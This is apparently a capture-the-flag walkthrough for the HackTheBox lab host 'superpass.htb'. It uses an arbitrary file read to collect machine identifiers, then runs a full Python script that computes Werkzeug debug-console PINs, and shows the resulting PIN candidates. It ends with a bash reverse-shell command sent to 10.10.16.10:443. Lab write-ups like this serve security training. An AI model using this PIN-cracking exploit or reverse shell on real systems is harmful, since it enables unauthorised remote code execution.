80

curl -i http://superpass.htb
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 13 Feb 2025 23:59:21 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 6128
Connection: keep-alive

It seems like during login. Sometimes the server looses connection with the DB and outputs these errors

sqlalchemy.exc.OperationalError: (pymysql.err.OperationalError) (2013, 'Lost connection to MySQL server during query')
[SQL: SELECT users.id AS users_id, users.username AS users_username, users.hashed_password AS users_hashed_password 
FROM users 
WHERE users.username = %(username_1)s 
 LIMIT %(param_1)s]
[parameters: {'username_1': 'admin', 'param_1': 1}]
(Background on this error at: https://sqlalche.me/e/14/e3q8)

We can register.

Looks like we can add creds in the vault and export it. When exporting it makes a GET request to /vault/export, which creates the .csv file on the backend, every time with a different name with the scheme username_export_randomnumber.csv. And on the next request it redirects us to /uploads?fn=username_export_randomnumber.csv.

The /download is vulnerable to arbitrary file read.

Going through the browser we see that it throws an error.

Its running Werkzeug. And it asks for a PIN to access the console. I found this post that explains how to exploit LFI to crack the PIN.

First we need to know the user who is running this application.

/proc/self/environ
-> USER=www-data

We also need the MAC address, machine_id, and cgroup.

/proc/net/arp
->IP address       HW type     Flags       HW address            Mask     Device
   10.10.10.2       0x1         0x2         00:50:56:b9:f4:52     *        eth0

Checking the MAC address of eth0.

/sys/class/net/eth0/address
00:50:56:b0:66:39

We have to convert it to decimal.

print(0x005056b06639)
345051784761

Next is machine_id

/etc/machine-id
-> ed5b159560f54721827644bc9b220d00

Next, cgroup

/proc/self/cgroup
-> 0::/system.slice/superpass.service

Concating them together

ed5b159560f54721827644bc9b220d00superpass.service

I used this script with the values I found here

import hashlib
import itertools
from itertools import chain

def crack_md5(username, modname, appname, flaskapp_path, node_uuid, machine_id):
    h = hashlib.md5()
    crack(h, username, modname, appname, flaskapp_path, node_uuid, machine_id)

def crack_sha1(username, modname, appname, flaskapp_path, node_uuid, machine_id):
    h = hashlib.sha1()
    crack(h, username, modname, appname, flaskapp_path, node_uuid, machine_id)

def crack(hasher, username, modname, appname, flaskapp_path, node_uuid, machine_id):
    probably_public_bits = [
            username,
            modname,
            appname,
            flaskapp_path ]
    private_bits = [
            node_uuid,
            machine_id ]

    h = hasher
    for bit in chain(probably_public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, str):
            bit = bit.encode('utf-8')
        h.update(bit)
    h.update(b'cookiesalt')

    cookie_name = '__wzd' + h.hexdigest()[:20]

    num = None
    if num is None:
        h.update(b'pinsalt')
        num = ('%09d' % int(h.hexdigest(), 16))[:9]

    rv =None
    if rv is None:
        for group_size in 5, 4, 3:
            if len(num) % group_size == 0:
                rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                              for x in range(0, len(num), group_size))
                break
        else:
            rv = num

    print(rv)

if __name__ == '__main__':

    usernames = ['www-data']
    modnames = ['flask.app', 'werkzeug.debug']
    appnames = ['wsgi_app', 'DebuggedApplication', 'Flask']
    flaskpaths = ['/app/venv/lib/python3.10/site-packages/flask/app.py']
    nodeuuids = ['345051784761']
    machineids = ['ed5b159560f54721827644bc9b220d00superpass.service']

    # Generate all possible combinations of values
    combinations = itertools.product(usernames, modnames, appnames, flaskpaths, nodeuuids, machineids)

    # Iterate over the combinations and call the crack() function for each one
    for combo in combinations:
        username, modname, appname, flaskpath, nodeuuid, machineid = combo
        print('==========================================================================')
        crack_sha1(username, modname, appname, flaskpath, nodeuuid, machineid)
        print(f'{combo}')
        print('==========================================================================

python3 pingen.py
==========================================================================
182-035-417
('www-data', 'flask.app', 'wsgi_app', '/app/venv/lib/python3.10/site-packages/flask/app.py', '345051784761', 'ed5b159560f54721827644bc9b220d00superpass.service')
==========================================================================
==========================================================================
203-660-657
('www-data', 'flask.app', 'DebuggedApplication', '/app/venv/lib/python3.10/site-packages/flask/app.py', '345051784761', 'ed5b159560f54721827644bc9b220d00superpass.service')
==========================================================================
==========================================================================
591-141-146
('www-data', 'flask.app', 'Flask', '/app/venv/lib/python3.10/site-packages/flask/app.py', '345051784761', 'ed5b159560f54721827644bc9b220d00superpass.service')
==========================================================================
==========================================================================
116-095-400
('www-data', 'werkzeug.debug', 'wsgi_app', '/app/venv/lib/python3.10/site-packages/flask/app.py', '345051784761', 'ed5b159560f54721827644bc9b220d00superpass.service')
==========================================================================
==========================================================================
473-071-948
('www-data', 'werkzeug.debug', 'DebuggedApplication', '/app/venv/lib/python3.10/site-packages/flask/app.py', '345051784761', 'ed5b159560f54721827644bc9b220d00superpass.service')
==========================================================================
==========================================================================
118-306-573
('www-data', 'werkzeug.debug', 'Flask', '/app/venv/lib/python3.10/site-packages/flask/app.py', '345051784761', 'ed5b159560f54721827644bc9b220d00superpass.service')
==========================================================================

Running it gives us a bunch of PIN numbers to use against the apps in the error pages console PIN input. And we get a python interpreter.

The system doesn't have nc, so I used bash rev shell.

import subprocess
subprocess.run(["bash", "-c", "bash -i >& /dev/tcp/10.10.16.10/443 0>&1"])

PreviousEnumeration NextFoothold

Last updated 10 months ago